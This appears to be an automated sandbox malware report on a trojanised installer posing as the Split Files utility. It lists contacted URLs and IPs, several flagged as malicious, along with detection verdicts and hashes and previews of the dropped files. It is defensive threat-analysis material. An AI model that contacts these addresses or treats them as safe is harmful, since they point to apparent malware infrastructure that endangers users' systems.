                http://107.182.129.235/storage/extension.phpuSplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://107.182.129.235/storage/extension.php2SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                unknown
                URL: http://107.182.129.235/storage/extension.phpr
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmp
                Malicious: false
                Antivirus detection:
                • 16%, Virustotal
                • Avira URL Cloud: malware
                Reputation: unknown
                URL: http://171.22.30.106/u
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmp
                Malicious: true
                Antivirus detection:
                • Avira URL Cloud: malware
                Reputation: unknown
                URL: http://www.remobjects.com/?ps
                Source: file.exe, 00000000.00000003.249157773.0000000002300000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.249345408.0000000002128000.00000004.00001000.00020000.00000000.sdmp, is-6A80U.tmp, is-6A80U.tmp, 00000001.00000002.339309119.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-HBEMJ.tmp.1.dr, is-6A80U.tmp.0.dr
                Malicious: false
                Antivirus detection:
                • URL Reputation: safe
                Reputation: unknown
                URL: http://107.182.129.235/storage/extension.phpC&
                Source: SplitFiles131.exe, 00000002.00000003.326963986.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320504531.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314196662.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303390876.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287148739.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308818308.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274854378.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.298000415.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292594501.0000000001839000.00000004.00000020.00020000.00000000.sdmp
                Malicious: false
                Antivirus detection:
                • Avira URL Cloud: safe
                Reputation: unknown
                URL: http://107.182.129.235ibrary.php
                Source: SplitFiles131.exe, 00000002.00000003.326963986.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320504531.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314196662.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303390876.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287148739.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308818308.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274854378.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.298000415.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292594501.0000000001839000.00000004.00000020.00020000.00000000.sdmp
                Malicious: false
                Antivirus detection:
                • URL Reputation: safe
                • URL Reputation: safe
                Reputation: unknown
                URL: http://171.22.30.106/library.phpT
                Source: SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp
                Malicious: true
                Antivirus detection:
                • 9%, Virustotal
                • Avira URL Cloud: malware
                Reputation: unknown
                URL: http://www.innosetup.comDVarFileInfo$
                Source: file.exe, 00000000.00000003.249290650.00000000023A9000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.249555772.00000000021CD000.00000004.00001000.00020000.00000000.sdmp, is-6A80U.tmp, 00000001.00000002.339420924.00000000004C4000.00000002.00000001.01000000.00000004.sdmp, is-HBEMJ.tmp.1.dr, is-6A80U.tmp.0.dr
                Malicious: false
                Antivirus detection:
                • Avira URL Cloud: safe
                Reputation: low
                URL: http://107.182.129.235/storage/ping.phpS
                Source: SplitFiles131.exe, 00000002.00000002.337974221.0000000001802000.00000004.00000020.00020000.00000000.sdmp
                Malicious: false
                Antivirus detection:
                • Avira URL Cloud: malware
                Reputation: unknown
                URL: http://171.22.30.106/
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmp
                Malicious: true
                Antivirus detection:
                • URL Reputation: malware
                Reputation: unknown
                URL: http://107.182.129.235/storage/extension.phpO
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000002.338008683.0000000001823000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmp
                Malicious: false
                Antivirus detection:
                • Avira URL Cloud: safe
                Reputation: unknown
                URL: http://www.altarsoft.com/split_files.shtml
                Source: is-6A80U.tmp, 00000001.00000002.340287748.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-6A80U.tmp, 00000001.00000002.339273052.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-7HLEL.tmp.1.dr, is-B5MB3.tmp.1.dr, is-E35J6.tmp.1.dr, is-AFEG0.tmp.1.dr, is-CSEUG.tmp.1.dr, is-OOV97.tmp.1.dr, is-7R5M5.tmp.1.dr, is-2PF6K.tmp.1.dr, is-FNEKR.tmp.1.dr, is-7QVA3.tmp.1.dr
                Malicious: false
                Antivirus detection:
                • Avira URL Cloud: safe
                Reputation: unknown
                URL: http://107.182.129.235/
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmp
                Malicious: false
                Antivirus detection:
                • Avira URL Cloud: safe
                Reputation: unknown
                URL: http://45.139.105.171/
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmp
                Malicious: false
                Antivirus detection:
                • URL Reputation: safe
                Reputation: unknown
                URL: http://rus.altarsoft.com/split_files.shtml
                Source: is-6A80U.tmp, 00000001.00000002.340287748.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-6A80U.tmp, 00000001.00000002.339273052.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-61K5M.tmp.1.dr, is-3OLEK.tmp.1.dr
                Malicious: false
                Antivirus detection:
                • Avira URL Cloud: safe
                Reputation: unknown
                URL: http://171.22.30.106/n
                Source: SplitFiles131.exe, 00000002.00000003.326963986.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320504531.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314196662.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303390876.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287148739.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308818308.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274854378.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.298000415.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292594501.0000000001839000.00000004.00000020.00020000.00000000.sdmp
                Malicious: true
                Antivirus detection:
                • Avira URL Cloud: malware
                Reputation: unknown
                URL: http://www.innosetup.com
                Source: file.exe
                Malicious: false
                Antivirus detection:
                • URL Reputation: safe
                Reputation: unknown
                URL: http://171.22.30.106/library.php4
                Source: SplitFiles131.exe, 00000002.00000002.337974221.0000000001802000.00000004.00000020.00020000.00000000.sdmp
                Malicious: true
                Antivirus detection:
                • Avira URL Cloud: malware
                Reputation: unknown
                URL: http://107.182.129.235/storage/extension.phpz
                Source: SplitFiles131.exe, 00000002.00000003.287148739.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274854378.0000000001839000.00000004.00000020.00020000.00000000.sdmp
                Malicious: false
                Antivirus detection:
                • Avira URL Cloud: malware
                Reputation: unknown
                URL: http://www.remobjects.com/?psU
                Source: file.exe, 00000000.00000003.249157773.0000000002300000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.249345408.0000000002128000.00000004.00001000.00020000.00000000.sdmp, is-6A80U.tmp, 00000001.00000002.339309119.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-HBEMJ.tmp.1.dr, is-6A80U.tmp.0.dr
                Malicious: false
                Antivirus detection:
                • URL Reputation: safe
                Reputation: unknown
                IP               Domain    Country    ASN    ASN Name            Malicious
                45.139.105.171   unknown   Italy      33657  CMCSUS              true
                45.139.105.1     unknown   Italy      33657  CMCSUS              true
                85.31.46.167     unknown   Germany    43659  CLOUDCOMPUTINGDE    true
                107.182.129.235  unknown   Reserved   11070  META-ASUS           true
                171.22.30.106    unknown   Germany    33657  CMCSUS              true
                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:778228
                Start date and time:2023-01-05 08:55:04 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 8m 42s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:file.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Run name:Run with higher sleep bypass
                Number of new started processes analysed:20
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@12/39@0/5
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 95%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                • TCP Packets have been reduced to 100
                • Excluded domains from analysis (whitelisted): fs.microsoft.com
                • Not all processes were analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                No simulations
                No context
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2193
                Entropy (8bit):4.702648325021821
                Encrypted:false
                SSDEEP:24:ElZ5/fnS3LWjwbf2VQZl5HXvbap4qDwGApRAboaGnMAzPelJoEhLifJy:mZ3jwbf2V25HjcwGpbpGMaelXh2g
                MD5:EA42A2F0D0B4CBE042DE38568E18F1AC
                SHA1:58B2B523D4CCB03A07F9B1CB53250F3C6BA0B771
                SHA-256:AF9B99F745D2B2F3E688336C68F69C9CADF7E85BF443100DDA4EBB507D86155A
                SHA-512:6F202138BE4B009152A72AB671A4C5D3AE5580211EDE11F4E35B89F2F1EF58E8B8DBD35E9DA1D12B7ABDD3BFD4EE342541DE8DE2437D0FCEA77A1C5782AE0E2A
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:Split Files 1.72....Contents:....1. Description...2. History...3. Localization...4. Contacts.....-----------------------------------------------------------------....1. Description.....Fast and easy file splitter and joiner...Split files by parts size or parts number...Create .bat file to merge parts without program.....-----------------------------------------------------------------....2. Development History:....17.10.2010 - update to version 1.72....- large files splitting error fix (over 2 Gb)..- new language: turkish....9.02.2010 - update to version 1.71....- split and join options in windows explorer pop-up menu....16.01.2010 - update to version 1.7....- new languages: dutch, italian, spanish..- delete input file after splitting....3.01.2010 - update to version 1.6....- compression (zip)..- drag and drop..- french language..- arabic language..- interface was changed....18.11.2008 - update to version 1.5....- large files splitting error fix (over 1 Gb)..- output folder selection..
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with very long lines (1053), with CRLF line terminators
                Category:dropped
                Size (bytes):2942
                Entropy (8bit):5.0506474169868945
                Encrypted:false
                SSDEEP:48:mRIjSLoZpLobGyYly6y4cMUNYzLEDa3dMSsXNBIi3Dl0r4k1z9bcX4Xl9asUvn6d:IW7Lob1YEgcMiDa3WN7BW1zLV1mngV4+
                MD5:58D65074A58BC8EAE2D5A3B589399A53
                SHA1:074E7E5BFD52200086309913670D49BA664FB279
                SHA-256:2F2487EDEEEA0D35394FD1C0B72D9C1FBF617DD014ED659083BDB0EFB12F6C90
                SHA-512:C0806DFC9DCD2A620693115679057B5374DEA3930E02F2B8DD1390C843D3F7C138CA8576CA35A5BCBEEA68E5CD9F5193C8D564A942C5A179DB9C5E6CAAA00266
                Malicious:false
                Preview:Split Files 1.72..............:....1. ...........2. ..........3. .............-----------------------------------------------------------------....1. ...................... ............. ... .......... ...... .. ..... ...... ..... . ............ .. .......... . ........ ..... ..... ..... ... ............ ... ........ ...... .. ......, ....... ........... ..... ........... ....... ... ........ .......... ....... ........ .... . .......... ... ..... ........... ..... ...... ........ ... ........ ..........: .. ..... ......, .. ....... ...... ...... ..... ..... ......... . ......, .........., .........., ........... ..... ....... .bat .... ... .......... ...... ... .......... ... ..... .......... ......... .bat .... . ..... ... ......... ..... ...... ... ............. . .bat ..... ........ ..... ........ ...... ..... ........ ...... ......... ...... ..... ..... ..... ..... ....., ........... zip ........... ... ...... ..... .......... ....... ...... ....., ....... ........ ........... ..
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Category:modified
                Size (bytes):3491315
                Entropy (8bit):5.600225128146387
                Encrypted:false
                SSDEEP:24576:8kvs+hjRbEtvgIyhbpegN4X94JFlWchs9F4AyM1n6iuAdsGR0A2O3DyLaYtBlecd:8VQj5EtvSpZvJFIp9IM1ft22mHBldXXL
                MD5:361518D6CC3C25EEC2DFC1DE82B055B2
                SHA1:5B298ED47BDEFA0BB953F277649CCB7C3A308C3C
                SHA-256:616BB3AC1AE4651819FCD80CB8357940061AF64A21401C33E8C84CFF41679211
                SHA-512:4EFAC7D2D772FDD8D3DAC80CE7874D5E85957D39B8F1392E00CF8969F87076A1146363990212ED79E63ADEF92427514E3E7D957B2E3E3D056E5A6741D57FA030
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~.c.........._...............................@..........................P......]m5..............................................P...e...........................................................................................................text...2........................... ..`.rdata...+.......0..................@..@.data........0.......0..............@....tls.... ....@.......@..............@....rsrc....p...P...p...P..............@..@.ave131...+......+.................`.*.................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with very long lines (1053), with CRLF line terminators
                Category:dropped
                Size (bytes):2942
                Entropy (8bit):5.0506474169868945
                Encrypted:false
                SSDEEP:48:mRIjSLoZpLobGyYly6y4cMUNYzLEDa3dMSsXNBIi3Dl0r4k1z9bcX4Xl9asUvn6d:IW7Lob1YEgcMiDa3WN7BW1zLV1mngV4+
                MD5:58D65074A58BC8EAE2D5A3B589399A53
                SHA1:074E7E5BFD52200086309913670D49BA664FB279
                SHA-256:2F2487EDEEEA0D35394FD1C0B72D9C1FBF617DD014ED659083BDB0EFB12F6C90
                SHA-512:C0806DFC9DCD2A620693115679057B5374DEA3930E02F2B8DD1390C843D3F7C138CA8576CA35A5BCBEEA68E5CD9F5193C8D564A942C5A179DB9C5E6CAAA00266
                Malicious:false
                Preview:Split Files 1.72..............:....1. ...........2. ..........3. .............-----------------------------------------------------------------....1. ...................... ............. ... .......... ...... .. ..... ...... ..... . ............ .. .......... . ........ ..... ..... ..... ... ............ ... ........ ...... .. ......, ....... ........... ..... ........... ....... ... ........ .......... ....... ........ .... . .......... ... ..... ........... ..... ...... ........ ... ........ ..........: .. ..... ......, .. ....... ...... ...... ..... ..... ......... . ......, .........., .........., ........... ..... ....... .bat .... ... .......... ...... ... .......... ... ..... .......... ......... .bat .... . ..... ... ......... ..... ...... ... ............. . .bat ..... ........ ..... ........ ...... ..... ........ ...... ......... ...... ..... ..... ..... ..... ....., ........... zip ........... ... ...... ..... .......... ....... ...... ....., ....... ........ ........... ..
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2193
                Entropy (8bit):4.702648325021821
                Encrypted:false
                SSDEEP:24:ElZ5/fnS3LWjwbf2VQZl5HXvbap4qDwGApRAboaGnMAzPelJoEhLifJy:mZ3jwbf2V25HjcwGpbpGMaelXh2g
                MD5:EA42A2F0D0B4CBE042DE38568E18F1AC
                SHA1:58B2B523D4CCB03A07F9B1CB53250F3C6BA0B771
                SHA-256:AF9B99F745D2B2F3E688336C68F69C9CADF7E85BF443100DDA4EBB507D86155A
                SHA-512:6F202138BE4B009152A72AB671A4C5D3AE5580211EDE11F4E35B89F2F1EF58E8B8DBD35E9DA1D12B7ABDD3BFD4EE342541DE8DE2437D0FCEA77A1C5782AE0E2A
                Malicious:false
                Preview:Split Files 1.72....Contents:....1. Description...2. History...3. Localization...4. Contacts.....-----------------------------------------------------------------....1. Description.....Fast and easy file splitter and joiner...Split files by parts size or parts number...Create .bat file to merge parts without program.....-----------------------------------------------------------------....2. Development History:....17.10.2010 - update to version 1.72....- large files splitting error fix (over 2 Gb)..- new language: turkish....9.02.2010 - update to version 1.71....- split and join options in windows explorer pop-up menu....16.01.2010 - update to version 1.7....- new languages: dutch, italian, spanish..- delete input file after splitting....3.01.2010 - update to version 1.6....- compression (zip)..- drag and drop..- french language..- arabic language..- interface was changed....18.11.2008 - update to version 1.5....- large files splitting error fix (over 1 Gb)..- output folder selection..
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:MS Windows 95 Internet shortcut text (URL=<http://www.altarsoft.com/split_files.shtml>), ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):97
                Entropy (8bit):5.12302231676258
                Encrypted:false
                SSDEEP:3:HRAbABGQYm/0S4UEtSNM5LTJOBCBuQpQQXXy:HRYFVm/r4UEtSeVTJuZQplHy
                MD5:DCD6923B008121BFF4C7C0AA1206286E
                SHA1:AD4EF16A96A80C8EA5DBC5933229580BC6C332E0
                SHA-256:E1E01BFA5E2B5A117A627F7E9E861CF63D852A66BCE0DF88094D59CAF61E4376
                SHA-512:EC4A399EB38A1FA64DF8990708168F134ACD0CA793930E57C6D3A260A537B20DFD9F8B7232987F32EC1C1A7CEC7EC91F15A644A63D275104D96588FC3D354B5C
                Malicious:false
                Preview:[InternetShortcut]..URL=http://www.altarsoft.com/split_files.shtml..Modified=500425EA770BCC01B2..
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):789258
                Entropy (8bit):6.369988626022893
                Encrypted:false
                SSDEEP:12288:EpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOU:emt2bfrP437QzH/A6A7E7dVPUxOU
                MD5:D3BA43B9E1B3838F28AFC558F2991D5B
                SHA1:1132F1C76760281A591F7DF99D592283103FCC87
                SHA-256:1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
                SHA-512:870371843F59B91D75B6C4D4C637075235D25CF3ABB059B58E39F9CD2833533A8F434307E7AD1175FD45082D3B4E4F0ED79F303ED77DEF553587E2819C092022
                Malicious:true
                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:data
                Category:dropped
                Size (bytes):3491315
                Entropy (8bit):5.600224518949536
                Encrypted:false
                SSDEEP:24576:3kvs+hjRbEtvgIyhbpegN4X94JFlWchs9F4AyM1n6iuAdsGR0A2O3DyLaYtBlecd:3VQj5EtvSpZvJFIp9IM1ft22mHBldXXL
                MD5:F488A4815DE52F915E37E40EA88B011F
                SHA1:16F9954F5E9FE6CB50125396B7DB524218D01237
                SHA-256:E13C9E749995269A3C45C6464B2F0BF55283288FD020FE4D0F1CA811142CC2AC
                SHA-512:04262ADC77B3126FCB9A8991612DDCFC35DF7F35988D108079A0BACF04350C57E829CA8E8C74833D0A0D9D9CD1DD480B9F4FA7145051AECF85D23C85A90667E2
                Malicious:false
                Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~.c.........._...............................@..........................P......]m5..............................................P...e...........................................................................................................text...2........................... ..`.rdata...+.......0..................@..@.data........0.......0..............@....tls.... ....@.......@..............@....rsrc....p...P...p...P..............@..@.ave131...+......+.................`.*.................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2266
                Entropy (8bit):5.4593359267896355
                Encrypted:false
                SSDEEP:48:HG8il+sqirh7zJ9YTHskp1r4phFAqLNnK9h:HGkSkp1r4NTKf
                MD5:4ABA9765EB3555788F5706D87A9D2DCA
                SHA1:36C0895FBF9F99690CA55C54CC56310E24513113
                SHA-256:E99B943206594C04BC0383669D04D4F191A501F46D2474FED08B997F8020B433
